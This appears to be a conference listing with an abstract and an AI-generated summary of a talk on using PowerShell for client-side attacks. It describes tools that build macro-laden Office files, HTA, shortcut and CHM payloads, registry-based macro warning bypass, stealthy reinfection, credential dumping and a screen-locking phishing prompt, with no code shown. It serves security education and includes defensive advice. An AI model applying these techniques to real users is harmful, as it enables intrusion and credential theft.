Presentation Material
Abstract
APT - A buzzword which refuses to die. Lets have some fun with it, lets move it to powershell. This talk would focus on using powershell for Client Side Attacks. Powershell is an ideal platform for client side attacks as it is available on all the Windows machines. We would see how easy and effective it is to use powershell for various client side attacks like drive-by-downloads, malicious attachments, Java applets, Human Interface Devices etc. The payloads which would be used with these attacks include in-memory code execeution, dump passwords and system secretsin plain text, backdoors, keyloggers, moving to other systems, reverse shells etc. The code used in the above talk will be released as open source. The talk would be full of live demonsrations.
AI Generated Summary
This talk addresses the effectiveness of client-side attacks using PowerShell, arguing that server-side vulnerabilities are increasingly monitored and patched, while client systems often remain less protected. PowerShell is highlighted as a powerful, native Windows component present by default on most targets, providing extensive access to system administration, WMI, .NET classes, and Active Directory without requiring additional tools.
The presenter introduces a toolkit for automating the creation of malicious documents and payloads. Key tools include:
- Out-Word/Out-Excel: Generates Word or Excel files with auto-executing VBA macros that download and run PowerShell scripts in memory, bypassing macro security warnings via registry modification. It can recursively infect existing DOCX/XLS files on a server, preserving timestamps for stealth.
- Out-HTA: Creates an HTML Application (HTA) and VBScript pair hosted on a web server; victim execution triggers PowerShell payloads but shows multiple security warnings.
- Out-Shortcut: Generates a malicious LNK shortcut pointing to PowerShell with embedded commands. The shortcut can be assigned a hotkey (e.g., F5) for repeated execution, and uses a consistent PowerShell path for compatibility across Windows versions.
- Out-CHM: Compiles a malicious Compiled HTML Help (CHM) file using Microsoft’s HTML Help Workshop. When opened, it executes PowerShell payloads silently, leveraging an older format that may evade detection.
Demonstrations show retrieving Meterpreter sessions via these payloads, using encoded PowerShell commands to bypass execution policies, and performing post-exploitation tasks like network reconnaissance, credential dumping, and recursive infection—all without special privileges. A noted technique involves a phishing prompt that locks the screen until valid credentials are entered.
Defensive recommendations emphasize user awareness training, disabling VBA macros where possible, and monitoring for suspicious PowerShell activity, as native tools complicate detection. The talk concludes that PowerShell-based client-side attacks remain highly effective due to their reliance on built-in Windows functionality and the persistent challenge of securing end-user behavior.